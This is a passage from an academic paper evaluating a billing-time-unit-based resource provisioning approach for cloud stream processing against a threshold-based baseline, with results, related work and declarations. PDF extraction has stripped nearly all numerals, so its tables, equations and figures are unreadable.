formula in eq. ( ). oee ¼ availability � performance � quality ( ) inform user (o ) the inform user operator type forwards the notifications to a human user. in our evaluation scenario, this operator type only serves as a monitoring endpoint for the sla compliance and all incoming data items are discarded at this operator type. generate report (o ) the generate report operator aggregates multiple oee values and generates a pdf report which aggregates a predefined amount of oee values. this report is then forwarded to the user for further manual inspection. evaluation deployment for our evaluation, we make use of the visp testbed (hochreiner, ), which is a toolkit of different evaluation utilities that support repeatable evaluation runs. the most notable component of this toolkit is the visp data provider, which allows simulating an arbitrary amount of data sources. furthermore, the data provider also allows defining different arrival patterns (see data arrival pattern) to evaluate the adaptation possibilities of the visp runtime, in particular of its scaling mechanisms. the evaluation runs are carried out in a private cloud running openstack (https://www.openstack.org), whereas the components are deployed on different vms, as depicted in fig. . the most relevant vm for our evaluation is the infrastructure vm, which hosts the visp runtime as well as all other relevant services, like the message infrastructure, i.e., rabbitmq (https://www.rabbitmq.com), the shared state, i.e., redis (http://redis.io) and the data storage, i.e., a mysql (https://www.mysql.com) database. for the topology enactment, the visp runtime leases (and releases) an arbitrary amount of vms, i.e., dockerhost vms, on the private openstack-based cloud at runtime. these dockerhost vms are used to run the operator instances, which take care of the actual data processing as described in “system architecture.” the operator images, which are required to run the operator instances, are hosted on an external service, i.e., hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.openstack.org https://www.rabbitmq.com http://redis.io https://www.mysql.com http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dockerhub (https://hub.docker.com). finally, the data provider vm is in charge of simulating the data stream from the sensors, as described in “sensor types.” evaluation configuration for the scalingthreshold used in algorithm , we use the value . this value was selected to be high enough to allow for minimal hardware disturbances, e.g., moving data from memory to the hard drive, but low enough to react to small changes of the data volume. the concrete value was identified on a number of preliminary experiments, evaluating different thresholds in the range of – , items, whereas the threshold was identified as the most suitable value for our purpose. regarding the individual weights w –w used in algorithm , we use the default value of to evaluate the base design of our btu-based provisioning approach without any specific emphasis on either the number of instances, scaling operations, queue load or the processing delay. besides the configuration aspects for algorithms and , there are also several other configuration aspects for the visp runtime. we chose a monitoring timespan of s, i.e., the queue load and resource usage of the system is recorded every s. the resource provisioning interval is set to s. this interval has been selected to update the resource configuration for the spe in short time intervals while ensuring enough time to download operator images from the external repository within one resource provisioning interval. regarding the btu, we use three different btu durations. the first duration is min (btu ), which used to be the predominant btu of amazon ec (https://aws.amazon. com/emr/pricing/). the second duration is min (btu ), which represented the minimal btu for the google compute engine (https://cloud.google.com/compute/ pricing) and the last duration is min (btu ), which has been selected to present a middle ground between the other two btus. furthermore, we assume a linear pricing model for the btus, i.e., one leasing duration for the btu model results in cost, one leasing duration for the btu model results in cost and the leasing duration for the btu model results in cost. for each data item, which is delayed, we accrue . penalty cost, i.e., , delayed items render the same cost as leasing a vm for min. these penalty cost have been chosen to impose little cost for delayed processing compared to penalty cost in other domains, e.g., for business processes (hoenisch et al., ). however, preliminary experiments have shown that higher penalty cost, openstack cloud visp data provider visp run�me message infrastructure shared state data storage operator instance operator instance docker hub operator image operator imagedata provider vm infrastructure vm dockerhost vm figure deployment for the evaluation scenario. full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://hub.docker.com https://aws.amazon.com/emr/pricing/ https://aws.amazon.com/emr/pricing/ https://cloud.google.com/compute/pricing https://cloud.google.com/compute/pricing http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ e.g., . or . , would render unreasonable high penalty cost compared to the actual resource cost even for a high sla compliance. finally, each dockerhost vm has the same computational resources with four virtual cpu cores and gb ram. baseline to evaluate our btu-based provisioning approach, we have selected a threshold-based baseline provisioning approach. the baseline implements a commonly used provisioning approach which already achieves very good results in terms of cost reduction against an over-provisioning scenario as shown in our previous work (hochreiner et al., a). the approach considers the amount of data items waiting on the incoming queue for processing as scaling trigger. as soon as the variable oqueue exceeds an upper threshold according to algorithm , the spe triggers an upscaling operation for this operator and as soon as oqueue falls below a lower threshold, i.e., , the spe triggers one downscaling action of an operator. besides the single upscaling trigger, our threshold-based approach triggers the upscaling operation twice, if oqueue surpasses a second upper threshold of data items waiting for processing. regarding the leasing of vms, we apply an on-demand approach, where the spe leases a new vm as soon as all currently used vms are fully utilized and releases a vm, as soon as the last operator instance on that vm is terminated. data arrival pattern for our evaluation, we have selected four different arrival patterns which simulate different load scenarios for the spe by submitting varying data volumes to the spe. the first arrival pattern has three different data volume levels, which are changed stepwise, so that the resulting arrival pattern could be approximated to a sinus curve, as shown in fig. a. these three different volume levels simulate different amounts of manufacturing machines ranging from two to eight machines that emit different amounts of data items, as shown in table . to speed up the evaluation, we simulate the real time data emissions shown in table every ms. this enables us on the one hand to simulate real-time minutes within only min in the course of our evaluation and therefore also increases the load on the spe. this also results in a volume level change every min. the second arrival pattern has only two levels, i.e., the lowest and the highest of the first pattern, which confronts the spe with more drastic volume changes, as shown in fig. b. due to the fact that we only apply two different levels, the state changes are twice as long as for the first pattern, i.e., min. the third and the fourth pattern represent random walks as defined by eq. ( ), whereas r represents a random number between and . this random walk is initialized with machine = and we have selected two random walk patterns which stay between one and eight machines. the results of this random walk can be seen in in fig. c for the first random walk and in fig. d for the second one. due to the random characteristic of the pattern generation, this pattern exhibits more changes of the data volume in short times compared to the first two data arrival patterns. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ machinen ¼ machinen� � r < : machinen� : � r � : machinen� þ r > : < : ( ) all four patterns are continuously generated by the visp data provider (https:// github.com/visp-streaming/dataprovider) throughout the whole evaluation duration of min. metrics to compare the evaluation results for both the btu-based and the threshold-based resource provisioning approaches, we have selected several metrics to describe both the overall cost as well as sla compliance metrics. after each evaluation run, these metrics are extracted by the visp reporting utility (https://github.com/visp-streaming/reporting). the most important metric is paid btus, which describes the total cost for data processing. this value comprises all vm upscaling and vm prolonging operations, which either lease new vms or extend the leasing for another btu for existing ones. the vm (a) stepwise pattern time (minutes) m a n u fa ct u ri n g m a ch in e s (b) −level pattern time (minutes) m a n u fa ct u ri n g m a ch in e s (c) random walk pattern time (minutes) m a n u fa ct u ri n g m a ch in e s (d) random walk pattern time (minutes) m a n u fa ct u ri n g m a ch in e s figure data arrival patterns. (a) shows the stepwise data arrival pattern; (b) shows the -level data arrival pattern; (c) shows the data arrival pattern based on the random walk ; (d) shows the data arrival pattern based on the random walk . full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/visp-streaming/dataprovider https://github.com/visp-streaming/dataprovider https://github.com/visp-streaming/reporting http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ downscaling sums up all downscaling operations, which are conducted before the end of the btu. the next set of metrics describes the sla compliance of the stream processing application. each stream processing operator is assigned a specific processing duration which describes the processing duration in a constant over-provisioning scenario. due to the changing data volume in our evaluation scenarios, it is often the case that the system suffers from under-provisioning for a short time, which results in longer processing durations. to assess the overall compliance of the processing durations, we define three different sla compliance levels. the first compliance level requires real-time processing capabilities, and states the share of data items that are produced within the given processing duration. the second level applies near-real-time requirements, which is defined by processing durations that take at most twice as long as the defined processing duration, and the third level applies a relaxed strategy, which means that the data items need to be processed within at most five times the stated processing duration. these sla metrics are obtained from the processing duration of the data items, which are recorded by the operators. to reduce the overall monitoring overhead, we only measure the processing duration of every th data item. nevertheless, preliminary evaluations with other intervals, e.g., every data item or every third data item have shown a similar metric reliability. this similar reliability can be explained due to the fact that observing every th data item still yields about – performance readings/second (depending on the data volume). therefore it is save to assume that these metrics cover all scaling decisions of the spe because all other activities, e.g., spawning a new operator instance takes – s or leasing a new vm takes about – s. the time to adapt metric states the arithmetic mean duration, which is required until the delayed processing for an operator type is back to real-time processing. the last metrics describe the scaling operations of operator instances. here we consider upscaling, downscaling as well as migration operations among different hosts. results and discussion for our evaluation we consider four different provisioning approaches. the first approach is the btu-agnostic threshold-based approach while the other three approaches are btu- based approaches with three different btu configurations as discussed in “evaluation deployment.” to obtain reliable numbers, we have conducted three evaluation runs for each provisioning approach and data arrival pattern, which results in evaluation runs. these evaluations have been executed over the time span of four weeks on a private openstack cloud. the raw data of the evaluation runs is hosted on github (https://github. com/visp-streaming/peerj_rawdata) and the concrete numbers can be reproduced by means of the visp reporting tool (https://github.com/visp-streaming/reporting). the discussion of our evaluation is divided in four subsections based on the four data arrival patterns. each subsection features a table which lists the average numbers of the three evaluation runs alongside with their standard deviations. additionally, we also provide a figure which represents the resource configurations of the operator instances and vms over the course of the evaluation for each data arrival pattern. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/visp-streaming/peerj_rawdata https://github.com/visp-streaming/peerj_rawdata https://github.com/visp-streaming/reporting http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for the discussion we are going to analyze the differences between the btu-based and the threshold-based approach in detail only for the stepwise data arrival pattern because this arrival pattern allows us to isolate specific aspects of the btu-based approach. nevertheless, our evaluations shows that the overall trend regarding the sla compliance and total cost is the same for all four data arrival patterns. for the other arrival patterns we only highlight specific aspects of the individual pattern and refer for all other effects to the discussion of the stepwise data arrival pattern. stepwise data arrival pattern for the stepwise pattern, we can see that the overall sla compliance is higher for the btu- based approach for all three sla compliance scenarios as shown in table . this compliance benefit ranges from % for the btu configuration in the real-time compliance scenario, up to % in the relaxed compliance scenario for the btu configuration. the sla compliance gain can be explained due to the downscaling strategy of the btu-based approach in contrast to the on-demand one for the threshold- based approach. the threshold-based approach only considers the amount of data items that are considered for processing based on each operator type for the scaling decisions, which can be observed in fig. d. this figure shows that the line for the operator instances follows the data volume very closely with a short delay because the threshold-based approach can only react based on the changes of the data volume. on closer inspection, one can also identify smaller increases after the downscaling phase, e.g., around minutes , or . these smaller bumps indicate that the downscaling approach was too eager and the spe has to compensate it by scaling up again. throughout this time span, i.e., between the detection of a lack of processing capabilities and the successful upscaling for the operator type, the spe is very likely to violate the sla compliance, especially in the real-time scenario. the btu-based approach does not exhibit such a strongly coupled relationship between the operator instances and the data volume. while the upscaling trigger is the same for both scenarios, there are clear differences in the downscaling behavior. the btu- based approach only considers downscaling activities briefly before the end of a btu, e.g., around minutes or for the btu scenario, around minute for the btu scenario and around minute for the btu scenario in figs. b and c. the result of table evaluation results for stepwise scenario. btu-based threshold-based btu btu btu btu btu btu real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) near real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) relaxed compliance % (s = %) % (s = %) % (s = %) % (s = %) resource cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) near real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) relaxed total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ this lazy downscaling strategy is a decrease of scaling activities, especially for the btu and btu scenario. this decrease in scaling activities results in a better sla compliance since the spe already maintains the processing capabilities for future data volume peaks as this is the case for the stepwise data arrival pattern. this results in high sla compliance values of over % for the btu and btu scenario. it needs to be noted that the lack of active downscaling activities does not increase the cost for computational resources since these resources have already been paid at the beginning of their btu. the btu-based downscaling operations are often triggered at suitable times, e.g., around minutes and for the btu configuration or minute for the btu configuration, where the downscaling activities do not impact the sla compliance. nevertheless, there are also points in time, when the btu of a vm coincides with a peak of the data volume, e.g., at minute for the btu configuration. in these situations, the btu-based approach will initialize the downscaling procedure to release a vm shortly before the end of its btu. in this specific case around minute for the btu scenario, the downscaling procedure is successful because monitoring does not report any delays for processing based on algorithm and the vm is triggered to be shut (a) btu–based (btu ) time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s (b) btu–based (btu ) time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s (c) btu–based (btu ) time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s (d) threshold–based time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s pattern vms operator instances figure stepwise pattern. (a) shows the resource provisioning configuration using the btu-based approach using a btu of min for the stepwise data arrival pattern; (b) shows the resource provisioning configuration using the btu-based approach using a btu of min for the stepwise data arrival pattern; (c) shows the resource provisioning configuration using the btu-based approach using a btu of min for the stepwise data arrival pattern; (d) shows the resource provisioning configuration using the threshold-based approach for the -level data arrival pattern. full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ down. but in the next reasoning cycle, the spe realizes the lack of processing capabilities and leases another vm to compensate the resource requirements. although these non-efficient scaling operations result in a measurable overhead as well as an sla compliance reduction, the btu-based approach still achieves a better sla compliance than the threshold-based approach. furthermore, it can be seen that the amount of scaling activities for the operator instances is inverse to the length of the btu. for the btu configuration, it can be observed in fig. a that the level of scaling activities is similar to those of the threshold- based scenario. this results in a rather low sla compliance, but for the btu and especially the btu there are less downscaling events, i.e., btu ends, which reduces the need to scale up again to comply with future data volume peaks. besides the sla compliance, we also consider the operational cost for data processing. these cost are composed of the resource cost, i.e., the cost for leasing vms and the penalty cost, which accrue for delayed data processing. in table , it can be seen that the resource cost for the btu and btu configuration are higher than the ones for the threshold-based ones. these higher cost can be explained due to the defensive approach of releasing vms for the btu-based approach, which often results in leasing the vm for another btu based on algorithm . for the btu configuration, the resource cost are around % lower than those for the threshold-based configuration. although the btu configuration uses more computational resources, as shown in fig. c, the overall cost are lower, because the threshold-based approach releases the vms often prematurely before the end of their btu, which results in a waste of already paid resources. when we consider only the resource cost, we can see that the btu-based approach only outperforms the threshold-based approach for the btu configuration. nevertheless, this situation changes when we also consider the penalty cost, i.e., cost for , delayed items. after adding the penalty cost and analyzing the total cost for the different compliance scenarios, we can see that only the real-time total cost for the btu configuration is higher than the threshold-based approach. all other scenarios result in slightly less cost for the btu configuration in the real-time scenario and up to a % cost-reduction for the near real-time one for the btu configuration. two-level data arrival pattern the two-level data arrival pattern exhibits the same trend for the sla compliance and cost for the stepwise data arrival pattern as shown in table . when we analyze the figs. a– d, we can also see a similar scaling behavior compared to the stepwise data arrival pattern. nevertheless, there is one notable effect for the btu configuration in fig. c. the btu-based provisioning approach tends to start more and more operator instances throughout the evaluation run. we can see that after minute , when the spe has enough processing capabilities, the upscaling trigger requests new operator instances from time to time to cope with the data volume. these upscaling operations are most likely due to minor external events, e.g., short network delays due to other applications running on the same physical hardware, which causes the spe to obtain hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ new processing capabilities. the result of this slow increase of operator instances over time is that the spe is likely to have more processing capabilities than it actually needs. nevertheless, at the end of the btu of a vm, the necessity of these processing capabilities is evaluated, and for example in the btu configuration, the operator instances are cut back around minute . after a short recalibration phase between (a) btu–based (btu ) time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s (b) btu–based (btu ) time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s (c) btu–based (btu ) time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s (d) threshold–based time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s pattern vms operator instances figure two-level pattern. (a) shows the resource provisioning configuration using the btu-based approach using a btu of min for the -level data arrival pattern; (b) shows the resource provisioning configuration using the btu-based approach using a btu of min for the -level data arrival pattern; (c) shows the resource provisioning configuration using the btu-based approach using a btu of min for the -level data arrival pattern; (d) shows the resource provisioning configuration using the threshold-based approach for the -level data arrival pattern. full-size doi: . /peerj-cs. /fig- table evaluation results for two-level scenario. btu-based threshold-based btu btu btu btu btu btu real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) near real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) relaxed compliance % (s = %) % (s = %) % (s = %) % (s = %) resource cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . . (s = . ) real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) near real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) relaxed total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ minutes and , the spe follows the same pattern again until the resources are cut back again around minute . this mechanism allows the spe to use the already leased resources, i.e., no additional vms are leased from minute until , to achieve a high resource utilization. random walk data arrival pattern based on the numbers of table , we can see that the random walk data arrival pattern follows the same trend for the sla compliance as well as total cost as the stepwise data arrival pattern. at closer inspection we can see that the sla compliance is very similar with a deviation of less than %. this aspect shows that both the baseline as well as the btu-based provisioning approach have similar characteristics for the rather simple data arrival pattern, like the stepwise or two-level one, as well as random ones. based on the figs. a– d, we can identify one notable difference between the btu-based and the threshold-based resource provisioning approach. while the operator instance curve and the data volume curve are well aligned for the threshold-based and the btu configuration, we can identify a clear gap for the btu in fig. b and especially for the btu configuration (fig. c). for the latter two configurations, the operator instance curve remains high although the data volume decreases over time. this behavior can be explained due to the optimal resource usage of the already paid resources, which enables the btu and btu configuration to keep the running operator instances without any additional cost. although this behavior may seem to be a waste of resources at first sight due to the deviation of the actual data volume and the operator instances, it becomes beneficial for the spe in terms of sla compliance when the volume rises again, e.g., around minutes or . random walk data arrival pattern the numerical results in terms of the sla compliance and total cost follow similar trends as for the stepwise data arrival pattern scenario, based on the numbers in table . for this data arrival pattern also only the btu configuration requires more cost than the threshold- based baseline for the real-time scenario. all other configurations and scenarios result in lower cost than the baseline. when we analyze the graphical representation of figs. a– d table evaluation results for random walk . btu-based threshold-based btu btu btu btu btu btu real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) near real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) relaxed compliance % (s = %) % (s = %) % (s = %) % (s = %) resource cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . . (s = . ) real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) near real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) relaxed total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ for the random walk data arrival pattern, the most prominent difference in contrast to the random walk data arrival pattern is the even better alignment of the operator instance and data volume curves. this is due to the fact that the data volume is rising for the second part of the evaluation, i.e., after minute , and the already paid resources can be actively used for data processing instead of only serving as free backup processing capabilities. time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s pattern vms operator instances (a) btu–based (btu ) (b) btu–based (btu ) (c) btu–based (btu ) (d) threshold–based figure random walk pattern . (a) shows the resource provisioning configuration using the btu-based approach using a btu of min for the random walk data arrival pattern ; (b) shows the resource provisioning configuration using the btu-based approach using a btu of min for the random walk data arrival pattern ; (c) shows the resource provisioning configuration using the btu-based approach using a btu of min for the random walk data arrival pattern ; (d) shows the resource provisioning configuration using the threshold-based approach for the random walk data arrival pattern . full-size doi: . /peerj-cs. /fig- table evaluation results for random walk . btu-based threshold-based btu btu btu btu btu btu real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) near real-time compliance % (s = %) % (s = %) % (s = %) % (s = %) relaxed compliance % (s = %) % (s = %) % (s = %) % (s = %) resource cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . . (s = . ) real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) near real-time total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) relaxed total cost . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) . (s = . ) hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ furthermore, it can be seen that the btu-based approach requires less scaling activities between minute and in contrast to the threshold-based approach in fig. d. this is again due to the lazy release characteristics of the btu-based approach, which result in a higher sla compliance in contrast to the threshold-based approach. evaluation conclusion when we compare the evaluation results of the four different data arrival patterns, we can see that they all share the same trend. regarding the sla compliance, we can see that the btu-based approach achieves a better sla compliance for all configurations for all compliance scenarios. furthermore, the sla values are roughly the same (with a maximum deviation of %) across all data arrival patterns despite their different characteristics. for the total cost, we can also see that only the btu configuration for the real-time scenario results in higher cost in contrast to the baseline. all other configurations and scenarios for the btu-based approach exhibit a cost reduction. additionally it must be noted that the resource cost are always lower for the btu configuration than for the threshold-based approach. time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s time (minutes) m a n u fa ct u ri n g m a ch in e s a n d v m s o p e ra to r in st a n ce s pattern vms operator instances (a) btu–based (btu ) (b) btu–based (btu ) (c) btu–based (btu ) (d) threshold–based figure random walk pattern . (a) shows the resource provisioning configuration using the btu-based approach using a btu of min for the random walk data arrival pattern ; (b) shows the resource provisioning configuration using the btu-based approach using a btu of min for the random walk data arrival pattern ; (c) shows the resource provisioning configuration using the btu-based approach using a btu of min for the random walk data arrival pattern ; (d) shows the resource provisioning configuration using the threshold-based approach for the random walk data arrival pattern . full-size doi: . /peerj-cs. /fig- hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we can also observe that the compliance for real-time data processing on cloud infrastructures is rather low, i.e., around % for the baseline and around – % for the btu-based approach. this is mainly due to the fact that cloud environments are often influenced by other applications running on the same physical hardware. this can result in minor data transmission or processing delays that have a severe impact on the sla compliance. nevertheless, we can see that for the near real-time and relaxed time scenarios, the sla compliance ranges from % to % for the btu-based approach, which meets the requirements of our motivational scenario discussed in “motivation.” threats to applicability although the presented system model builds on top of real-world observations, it cannot be guaranteed that all external aspects are adequately considered in our system model which may result in a non-optimal performance in real-world deployments. nevertheless, we consider this risk as rather small, since we have already conducted our evaluations in a cloud-based testbed, which already considers external influences by other applications running on the same cloud environment. to consider such external effects for the evaluation, we repeated each evaluation scenario and configuration three times on different days (including the weekend) to cover different usage scenario on the openstack-based cloud due to other stakeholders on the same physical hardware. related work in the last couple of years, the landscape of spes has been constantly increasing. in contrast to the rather basic spes, like aurora (balakrishnan et al., ) or borealis (abadi et al., ), which have been designed more than a decade ago, today’s spes incorporate technological advances like cloud computing and can process large volumes of data in parallel. while some of these spes are rather focused on cluster-based deployments, like system s (gedik et al., ), most are designed to utilize cloud-based deployments, like apache spark (zaharia et al., ), apache flink (carbone et al., ), apache storm (toshniwal et al., ) or its derivative heron (kulkarni et al., ). despite the focus on designing efficient spes, the resource elasticity aspects of individual operator instances (or workers) have only been picked up recently, e.g., for apache spark streaming or the automatic reconfiguration for apache storm based on hints for the number of workers. to the best of our knowledge there exists no established spes which consider a two-level resource provisioning architecture, since most spes outsource this functionality to other frameworks like apache mesos or kubernetes. however, there are a couple of prototypes and concepts in the literature, which propose a mechanism for elastic stream processing. several research groups have picked up the challenge of replacing the previously dominant strategy of data quality degradation, i.e., load shedding (babcock, datar & motwani, ; tatbul, çetintemel & zdonik, ), with resource elasticity. nevertheless, most of the first publications focus on an optimal resource configuration only when deploying a topology and do not consider any updates at runtime, e.g., setty et al. ( ) for pub/sub systems or florescu & kossmann ( ) for database systems. the next step hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ toward resource elasticity was proposed by lim, han & babu ( ), who proposed the redeployment of complete applications for database management systems whenever the resource requirements change. although this approach already supports resource elasticity, it was required to refine this approach to only consider operator instances instead of complete applications. one of the first publications in the domain of data stream processing was authored by schneider et al. ( ), which proposed the parallelization of stream processing operations with system s. because this first approach only considered stateless operators, the authors complemented their approach in a succeeding publication to consider the replication of stateful operators (gedik et al., ). besides the elasticity extension to system s, there are also several proposed extensions to apache storm, which replace the default scheduler with custom implementations to optimize the parallelization of operators as well as the placement thereof on different computational resources. two of these approaches have been presented by aniello, baldoni & querzoni ( ) and xu et al. ( ). these two publications present threshold-based custom schedulers, which can adopt the topology deployment at runtime, depending on the incoming data volume and the actual load for apache storm. although any replication of a specific operator provides additional processing capabilities, it needs to be noted that any reconfiguration of the topology enactment has a negative impact on the processing performance. to minimize these reconfiguration aspects, stela (xu, peng & gupta, ), introduces new performance indicators to focus on the actual throughput of the spe and to reduce any reconfiguration aspects. to extend the rather static aspect of the threshold-based scaling approaches, heinze et al. ( ) propose a threshold-based resource optimization, whose thresholds are adopted based on an online learning mechanism within a custom spe. this allows resource optimization to adapt the otherwise fixed thresholds, which are predefined before the topology enactment, at runtime to improve the resource utilization based on actual monitoring data. seep (castro fernandez et al., ), another custom spe, also proposes a simple threshold-based replication mechanism. in contrast to the other already discussed approaches, seep focuses on stateful operators and employs a dedicated fault tolerance mechanism. besides the basic replication approaches, there are also some works that optimize specific aspects for the topology enactment. one of these aspects is the partitioning of data to optimize the data flow among the operators, especially regarding stateful operators. the streamcloud (gulisano et al., ) spe proposes a mechanism to partition the incoming data to distribute it efficiently among different replicas of one operator type. another approach for optimizing the overall efficiency of a topology enactment is to optimize the placement of operators within a potential heterogeneous pool of computational resources. cardellini et al. ( ) propose an extension to apache storm, which considers an optimal placement of operators in terms of sla-based criteria on different cloud resources. furthermore, de matteis & mencagli ( ) present a predictive approach to minimize the latency and improve the energy efficiency of the spe. this approach allows to reduce the reconfiguration of spes, which is also one of the objectives in our approach. the last notable approach for optimizing the topology enactment on hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ cloud resources is to optimize the deployment of operators according to their specific processing tasks. hanna et al. ( ) consider different types of vms, e.g., with an emphasis on cpu or gpu, and optimize the deployment based on the suitability of these machines to conduct specific operations, e.g., matrix multiplications are significantly faster when executed on the gpu. although the literature already provides different optimization approaches, to the best of our knowledge, none of these approaches considers the btu aspect of vms when optimizing processing resources as proposed in this paper. also, most of the discussed approaches only aim at optimizing the amount of replicas for processing operators, but do ignore the reconfiguration overhead during the topology enactment. conclusion within this paper, we have discussed the most important requirements for optimizing data stream processing in volatile environments. based on these requirements, we have developed an extensive system model for which we have presented a btu-based optimization approach. this optimization approach has been evaluated with four different data arrival pattern against a threshold-based approach, which already provides a significant cost reduction based on our previous work (hochreiner et al., a). the evaluation has shown that the btu-based approach results in a better sla compliance which also achieves a better overall cost structure compared to the threshold-based approach. nevertheless, as a result of the evaluation, we have also identified a potential extension possibility for our btu-based approach, namely the addition of a more sophisticated predictive component. so far we only consider the trend for upscaling operator instances, but we do not consider historical information nor other monitoring information, e.g., as suggested by copil et al. ( ), for downscaling purposes, which could yield even better results. in our future work, we plan to also apply our btu-based approach to hybrid clouds. this requires an extension of the optimization model regarding the networking capabilities among these clouds. furthermore, we plan to investigate the structural properties of the topology in more detail, e.g., to identify critical paths or high volume operators, such as the operators o and o in our topology. these insights may help us to apply different scaling priorities, especially for downscaling operations to avoid oscillating effects. in addition we also plan to evaluate the impact of using the individual weights w –w in algorithm within both private and hybrid clouds. additional information and declarations funding this work is supported by tu wien research funds and by the commission of the european union within the crema h -ria project (grant agreement no. ). there was no additional external funding received for this study. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. hochreiner et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: tu wien research funds and by the commission of the european union within the crema h -ria project: . competing interests schahram dustdar and stefan schulte are academic editors for peerj. author contributions � christoph hochreiner conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. � michael vögler conceived and designed the experiments, wrote the paper, reviewed drafts of the paper. � stefan schulte wrote the paper, reviewed drafts of the paper. � schahram dustdar reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the source code repositories for the prototype implementation, evaluation tools as well as the raw data for the evaluation can be found in the visp-streaming project: https://github.com/visp-streaming. references abadi dj, ahmad y, balazinska m, cetintemel u, cherniack m, hwang j-h, lindner w, maskey a, rasin a, ryvkina e. . the design of the borealis stream processing engine. in: conference on innovative data systems research, asilomar, ca, usa, – . andonov r, poirriez v, rajopadhye s. . unbounded knapsack problem: dynamic programming revisited. european journal of operational research ( ): – doi . /s - ( ) - . aniello l, baldoni r, querzoni l. . adaptive online scheduling in storm. in: th international conference on distributed event-based systems (debs), arlington, tx, usa. new york: acm, – . armbrust m, fox a, griffith r, joseph 